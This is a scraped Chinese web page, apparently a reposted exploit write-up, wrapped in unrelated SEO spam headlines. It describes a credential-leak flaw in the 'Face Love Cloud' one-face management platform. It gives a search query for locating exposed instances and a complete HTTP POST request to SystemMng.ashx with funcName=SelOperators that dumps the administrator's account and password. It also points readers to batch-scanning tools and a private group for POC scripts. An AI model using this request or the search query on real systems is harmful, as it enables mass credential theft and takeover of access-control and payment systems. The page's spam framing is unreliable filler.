当前位置: 首页 > news >正文

做网站制作怎么样牛推网

做网站制作怎么样,牛推网,建站平台的服务产品分析,龙华响应式网站建设0x01 产品简介 脸爱云一脸通智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一脸通系统。无需安装,只需在后台配置即可在浏览器登录。 功能包括:系统管理中心、人员信息管理中心、设备…

0x01 产品简介

脸爱云一脸通智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一脸通系统。无需安装,只需在后台配置即可在浏览器登录。
功能包括:系统管理中心、人员信息管理中心、设备管理中心、消费管理子系统、订餐管理子系统、水控管理子系统、电控管理子系统、考勤管理子系统、门禁通道管理子系统、会议签到管理子系统、访客管理子系统。

0x02 漏洞概述

脸爱云一脸通智慧管理平台存在信息泄露漏洞,该漏洞源于SystemMng.ashx接口处存在信息泄露漏洞,攻击者能够利用该漏洞通过SelOperators参数泄露的当前管理员的敏感信息,包括账号密码登录系统后台。

0x03 搜索语法

body="View/UserReserved/UserReservedTest.aspx"

在这里插入图片描述

0x04 漏洞复现

POST /SystemMng.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: closeusername=admin&funcName=SelOperators

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

http://www.zhongyajixie.com/news/56059.html

相关文章:

  • dede投票类网站源码人民日报新闻
  • 有什么网站做任务给钱的月饼营销软文
  • 政府类网站风格特点廊坊百度提升优化
  • 网页制作与设计alt什么意思seo分析师招聘
  • 做网站应该买哪一种服务器线上推广引流渠道
  • 大兴网站设计谷歌play商店官网
  • 苏州网站建设设计优化公司结构
  • 网站建设开源项目github百度地图网页版
  • 湘潭网站优化重庆seo排名技术
  • 翡翠网站建设ppt企业网站建设平台
  • 携程旅游网站官网百度快照的作用是什么
  • 随州网站建设哪家专业沈阳今日新闻头条
  • 信息手机网站模板下载软件百度移动端模拟点击排名
  • 功能网站建设谷歌seo优化排名
  • 网站做树状结构有什么作用优秀网站
  • Centos建网站必须域名国外推广渠道平台
  • 主任说到学校新网站的建设工作企业网站模板免费
  • 网上做博彩网站代理赚钱吗推广计划书怎么写
  • 昆明房产网站建设国内免费发布产品的平台
  • web网站开发作品seo优化是什么职业
  • 做外贸有哪些好的网站北京做网站的公司排行
  • 怎么做监控直播网站网页搜索引擎优化技术
  • 宝安网站设计营销推广方案设计
  • 咸阳营销型网站开发怎样建立网站平台
  • 市北区大型网站建设怎么自己做一个网址
  • 网站制作价格上海网络营销常用工具
  • 做图用哪个素材网站百度一下官方入口
  • 做网站困难吗seo技术蜘蛛屯
  • 佛山模板建站定制网站做企业推广的公司
  • 网页版面布局淘宝seo排名优化